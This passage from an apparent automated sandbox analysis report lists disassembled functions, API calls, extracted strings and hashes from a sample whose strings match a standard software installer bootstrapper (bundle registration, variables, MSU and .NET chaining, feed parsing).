                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                                                                                                                              • Instruction ID: 1e16f1a6a797550077f7558a0469686e9fb0162fad0670a76303c5270e2887c1
                                                                                                                                                              • Opcode Fuzzy Hash: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                                                                                                                              • Instruction Fuzzy Hash: 02B1A6332051A64BEF2D4339843447EFBE16E923B131A179DD5B2CB3C6EE289535D6A0
                                                                                                                                                              Function 007F2E47 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 3a540c1a3de8ee6690d91daa133e103aa820faafca9d52b8037db3454c19a1de
                                                                                                                                                              • Instruction ID: 6e88f7361004678e97048db4e69d73db0f2a164c1370488d022aad4f82198866
                                                                                                                                                              • Opcode Fuzzy Hash: 3a540c1a3de8ee6690d91daa133e103aa820faafca9d52b8037db3454c19a1de
                                                                                                                                                              • Instruction Fuzzy Hash: 6A615B7172070D96DB3899288899BBE63E5AF41710F64091AFB42DF383D61DDE83C615
                                                                                                                                                              Function 007CCDBD Relevance: 86.1, APIs: 3, Strings: 46, Instructions: 366COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,comres.dll,00000000,0080CA9C,?,00000000), ref: 007CCEF3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateCompareProcessString
                                                                                                                                                              • String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$cabinet.dll$comres.dll$download$embedded$external$feclient.dll$msasn1.dll$msi.dll$payload.cpp$version.dll$wininet.dll
                                                                                                                                                              • API String ID: 1171520630-1949177747
                                                                                                                                                              • Opcode ID: 799bb626a704e824f0488de0cbba415f0f4fa41f387d31a82cb672fc41feac23
                                                                                                                                                              • Instruction ID: 0c73031c1818be76eaeefdb30313e90d054cb7b6791cc82f1bbf3115f854b2ad
                                                                                                                                                              • Opcode Fuzzy Hash: 799bb626a704e824f0488de0cbba415f0f4fa41f387d31a82cb672fc41feac23
                                                                                                                                                              • Instruction Fuzzy Hash: ACC1D072904629FBCB719A94CC02FADB764FB04B20F25427DFA11F66D1D778EE009A90
                                                                                                                                                              Function 007CFF99 Relevance: 84.5, APIs: 1, Strings: 47, Instructions: 484registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000), ref: 007D0592
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.11.1.2318$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update name and publisher.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor
                                                                                                                                                              • API String ID: 3535843008-2755343042
                                                                                                                                                              • Opcode ID: 93dad02a8615c30061fa5b3fbcd0f8759ff4890839bc386bf26da5dba971ff44
                                                                                                                                                              • Instruction ID: 4a8ce0c8a92bc82b0a85ab9224ca99be385cc61072b790bc898a42a02a741b01
                                                                                                                                                              • Opcode Fuzzy Hash: 93dad02a8615c30061fa5b3fbcd0f8759ff4890839bc386bf26da5dba971ff44
                                                                                                                                                              • Instruction Fuzzy Hash: 23F1C031A41A25BBCF2256649D06FAE7679FF00720F041112FD11F63A1CBB9EDA0EAC1
                                                                                                                                                              Function 007C8476 Relevance: 61.6, APIs: 5, Strings: 30, Instructions: 331COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000,80070490,?,?,?,?,?,?,?,ET|,007EC1BF,?,?,?), ref: 007C84A7
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,ET|,007EC1BF,?,?,?,?,ET|,Chain), ref: 007C8804
                                                                                                                                                              Strings
                                                                                                                                                              • Initializing version variable '%ls' to value '%ls', xrefs: 007C8653
                                                                                                                                                              • Invalid value for @Type: %ls, xrefs: 007C8778
                                                                                                                                                              • Initializing numeric variable '%ls' to value '%ls', xrefs: 007C85E2
                                                                                                                                                              • Failed to get @Hidden., xrefs: 007C87E8
                                                                                                                                                              • version, xrefs: 007C862C
                                                                                                                                                              • Failed to get variable node count., xrefs: 007C84E1
                                                                                                                                                              • variable.cpp, xrefs: 007C87B9
                                                                                                                                                              • Failed to set variant value., xrefs: 007C878F
                                                                                                                                                              • Failed to set value of variable: %ls, xrefs: 007C87A7
                                                                                                                                                              • Variable, xrefs: 007C84B1
                                                                                                                                                              • Failed to select variable nodes., xrefs: 007C84C4
                                                                                                                                                              • numeric, xrefs: 007C85BC
                                                                                                                                                              • ET|, xrefs: 007C8476
                                                                                                                                                              • Value, xrefs: 007C8565
                                                                                                                                                              • string, xrefs: 007C85F7
                                                                                                                                                              • Failed to insert variable '%ls'., xrefs: 007C86C6
                                                                                                                                                              • Failed to set variant encryption, xrefs: 007C879D
                                                                                                                                                              • Failed to get @Id., xrefs: 007C87EF
                                                                                                                                                              • Failed to get @Persisted., xrefs: 007C87E1
                                                                                                                                                              • Failed to find variable value '%ls'., xrefs: 007C87D2
                                                                                                                                                              • Failed to get @Type., xrefs: 007C8788
                                                                                                                                                              • Failed to get @Value., xrefs: 007C8796
                                                                                                                                                              • Initializing string variable '%ls' to value '%ls', xrefs: 007C861A
                                                                                                                                                              • Initializing hidden variable '%ls', xrefs: 007C8671
                                                                                                                                                              • Failed to change variant type., xrefs: 007C87DA
                                                                                                                                                              • Failed to get next node., xrefs: 007C87F6
                                                                                                                                                              • Attempt to set built-in variable value: %ls, xrefs: 007C87C8
                                                                                                                                                              • Persisted, xrefs: 007C854A
                                                                                                                                                              • Hidden, xrefs: 007C852F
                                                                                                                                                              • Type, xrefs: 007C85A3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                              • String ID: Attempt to set built-in variable value: %ls$ET|$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
                                                                                                                                                              • API String ID: 3168844106-1246278463
                                                                                                                                                              • Opcode ID: 3761819c129e8a05afada8616cdeed6667147d8853634ddc808f0a719c2e2d09
                                                                                                                                                              • Instruction ID: ea5035fc4ee1c234144720b2ae9377c73e7f1230616ef81aacd5722247fc8972
                                                                                                                                                              • Opcode Fuzzy Hash: 3761819c129e8a05afada8616cdeed6667147d8853634ddc808f0a719c2e2d09
                                                                                                                                                              • Instruction Fuzzy Hash: 8FB19372D40229FBCB919B94CC45FAEBBB5FF44720F20025DF910B62D1DB799A409B92
                                                                                                                                                              Function 007E6CCC Relevance: 58.1, APIs: 7, Strings: 26, Instructions: 379COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,007DBDDC,00000007,?,?,?), ref: 007E6D20
                                                                                                                                                                • Part of subcall function 00800ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,007C5EB2,00000000), ref: 00800AE0
                                                                                                                                                                • Part of subcall function 00800ACC: GetProcAddress.KERNEL32(00000000), ref: 00800AE7
                                                                                                                                                                • Part of subcall function 00800ACC: GetLastError.KERNEL32(?,?,?,007C5EB2,00000000), ref: 00800AFE
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 007E710F
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 007E7123
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to determine WOW64 status., xrefs: 007E6D32
                                                                                                                                                              • wusa.exe, xrefs: 007E6DA0
                                                                                                                                                              • /log:, xrefs: 007E6EA2
                                                                                                                                                              • "%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 007E6E75
                                                                                                                                                              • Failed to allocate WUSA.exe path., xrefs: 007E6DB3
                                                                                                                                                              • Failed to CreateProcess on path: %ls, xrefs: 007E6F9A
                                                                                                                                                              • Failed to ensure WU service was enabled to install MSU package., xrefs: 007E6F2E
                                                                                                                                                              • Failed to find System32 directory., xrefs: 007E6D95
                                                                                                                                                              • Failed to format MSU uninstall command., xrefs: 007E6E89
                                                                                                                                                              • Failed to find Windows directory., xrefs: 007E6D5F
                                                                                                                                                              • msuengine.cpp, xrefs: 007E6F8D, 007E7022, 007E704A
                                                                                                                                                              • Failed to build MSU path., xrefs: 007E6E35
                                                                                                                                                              • Failed to get action arguments for MSU package., xrefs: 007E6DD6
                                                                                                                                                              • Failed to append log switch to MSU command-line., xrefs: 007E6EB6
                                                                                                                                                              • Failed to append log path to MSU command-line., xrefs: 007E6ED4
                                                                                                                                                              • Bootstrapper application aborted during MSU progress., xrefs: 007E7054
                                                                                                                                                              • Failed to wait for executable to complete: %ls, xrefs: 007E709E
                                                                                                                                                              • Failed to format MSU install command., xrefs: 007E6E5C
                                                                                                                                                              • Failed to get process exit code., xrefs: 007E702C
                                                                                                                                                              • D, xrefs: 007E6F3B
                                                                                                                                                              • 2, xrefs: 007E6FB3
                                                                                                                                                              • Failed to get cached path for package: %ls, xrefs: 007E6DFC
                                                                                                                                                              • WixBundleExecutePackageCacheFolder, xrefs: 007E6E0B, 007E713B
                                                                                                                                                              • Failed to append SysNative directory., xrefs: 007E6D7D
                                                                                                                                                              • "%ls" "%ls" /quiet /norestart, xrefs: 007E6E48
                                                                                                                                                              • SysNative\, xrefs: 007E6D6A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                                                                                                              • String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuengine.cpp$wusa.exe
                                                                                                                                                              • API String ID: 1400713077-4261965642
                                                                                                                                                              • Opcode ID: 354bef62e21e5b49cd283d1c810f5fe676eee5d4b6e796763c9a8a870e5fc451
                                                                                                                                                              • Instruction ID: 745f249d7bd5a48e880ef1cc1620498404493d802a7e8a512d8f77c21aee7b08
                                                                                                                                                              • Opcode Fuzzy Hash: 354bef62e21e5b49cd283d1c810f5fe676eee5d4b6e796763c9a8a870e5fc451
                                                                                                                                                              • Instruction Fuzzy Hash: 19D18C70B4135AEADF119FA6CC86FAE7BB8FF28710F500029B610E6191D7B99940DB51
                                                                                                                                                              Function 007D54DC Relevance: 52.7, APIs: 17, Strings: 13, Instructions: 229filepipesleepCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,00000000,?,0080B500,?,00000000,?,007C452F,?,0080B500), ref: 007D54FD
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,007C452F,?,0080B500), ref: 007D5508
                                                                                                                                                              • SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,007C452F,?,0080B500), ref: 007D553F
                                                                                                                                                              • ConnectNamedPipe.KERNEL32(?,00000000,?,007C452F,?,0080B500), ref: 007D5554
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D555E
                                                                                                                                                              • Sleep.KERNEL32(00000064,?,007C452F,?,0080B500), ref: 007D5593
                                                                                                                                                              • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,007C452F,?,0080B500), ref: 007D55B6
                                                                                                                                                              • WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,007C452F,?,0080B500), ref: 007D55D1
                                                                                                                                                              • WriteFile.KERNEL32(?,/E|,0080B500,00000000,00000000,?,007C452F,?,0080B500), ref: 007D55EC
                                                                                                                                                              • WriteFile.KERNEL32(?,comres.dll,00000004,feclient.dll,00000000,?,007C452F,?,0080B500), ref: 007D5607
                                                                                                                                                              • ReadFile.KERNEL32(?,wininet.dll,00000004,feclient.dll,00000000,?,007C452F,?,0080B500), ref: 007D5622
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D567D
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D56B1
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D56E5
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D5719
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D574A
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D577B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                                                                                                                              • String ID: /E|$Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$comres.dll$crypt32.dll$feclient.dll$pipe.cpp$wininet.dll
                                                                                                                                                              • API String ID: 2944378912-3629184392
                                                                                                                                                              • Opcode ID: 82ec010c969cd87fc280c6e7f965419d9236485208af037a075e2710ff076b7f
                                                                                                                                                              • Instruction ID: f222642b49e946f150b78fe61e2076150fd6b0e68284c5c9659d9d7cc117dab0
                                                                                                                                                              • Opcode Fuzzy Hash: 82ec010c969cd87fc280c6e7f965419d9236485208af037a075e2710ff076b7f
                                                                                                                                                              • Instruction Fuzzy Hash: EB71A676D81635BBD7209AA58C49FAE76B8BF04F20F214126BD15FB380E66CDD4086E0
                                                                                                                                                              Function 007ED43E Relevance: 49.3, APIs: 12, Strings: 16, Instructions: 290synchronizationprocessCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • UuidCreate.RPCRT4(?), ref: 007ED4B3
                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000027), ref: 007ED4DC
                                                                                                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 007ED5C5
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 007ED5CF
                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 007ED668
                                                                                                                                                              • WaitForSingleObject.KERNEL32(0080B500,000000FF,?,?,?,?), ref: 007ED673
                                                                                                                                                              • ReleaseMutex.KERNEL32(0080B500,?,?,?,?), ref: 007ED69D
                                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 007ED6BE
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 007ED6CC
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 007ED704
                                                                                                                                                                • Part of subcall function 007ED33E: WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,007ED642,?), ref: 007ED357
                                                                                                                                                                • Part of subcall function 007ED33E: ReleaseMutex.KERNEL32(?,?,?,?,007ED642,?), ref: 007ED375
                                                                                                                                                                • Part of subcall function 007ED33E: WaitForSingleObject.KERNEL32(?,000000FF), ref: 007ED3B6
                                                                                                                                                                • Part of subcall function 007ED33E: ReleaseMutex.KERNEL32(?), ref: 007ED3CD
                                                                                                                                                                • Part of subcall function 007ED33E: SetEvent.KERNEL32(?), ref: 007ED3D6
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 007ED7B9
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 007ED7D1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Wait$ErrorLastMutexObjectReleaseSingle$CloseCreateHandleProcess$CodeEventExitFromMultipleObjectsStringUuid
                                                                                                                                                              • String ID: %ls /pipe %ls$D$D$~$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
                                                                                                                                                              • API String ID: 1533322865-2726749349
                                                                                                                                                              • Opcode ID: 0caef6e80a24fdab0f4c2b4561293df17b987a93886c78da2d80fefc88edae38
                                                                                                                                                              • Instruction ID: b58ca6cba94384feb065325ce8c6030ce20fc8fbaa4e318beb4827672f375cd5
                                                                                                                                                              • Opcode Fuzzy Hash: 0caef6e80a24fdab0f4c2b4561293df17b987a93886c78da2d80fefc88edae38
                                                                                                                                                              • Instruction Fuzzy Hash: D3A19F72D01268EFDB319BA5CC45BAEB7B8FB08720F114169E918F7252D7399D408F91
                                                                                                                                                              Function 0080744A Relevance: 47.6, APIs: 13, Strings: 14, Instructions: 340COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 0080755D
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00807726
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 008077C3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$FreeHeap$AllocateCompareProcess
                                                                                                                                                              • String ID: ($@$`<u$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
                                                                                                                                                              • API String ID: 1555028553-639730868
                                                                                                                                                              • Opcode ID: c4a12aa1f4ff3527408558349061212759ace5d46fbcd1198c84fb66a9bf77bd
                                                                                                                                                              • Instruction ID: 7abb7b490bfb778dc1650225fa008ff708c813c407dc086f52ad63d00dae972e
                                                                                                                                                              • Opcode Fuzzy Hash: c4a12aa1f4ff3527408558349061212759ace5d46fbcd1198c84fb66a9bf77bd
                                                                                                                                                              • Instruction Fuzzy Hash: AEB14B31D4922ABBDB919BA4CC42FAAB664FB04770F200355F621E62D1D771FA50DBA0
                                                                                                                                                              Function 0080710D Relevance: 47.5, APIs: 11, Strings: 16, Instructions: 298COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,00823E78,000000FF,?,?,?), ref: 008071D4
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 008071F9
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 00807219
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 00807235
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 0080725D
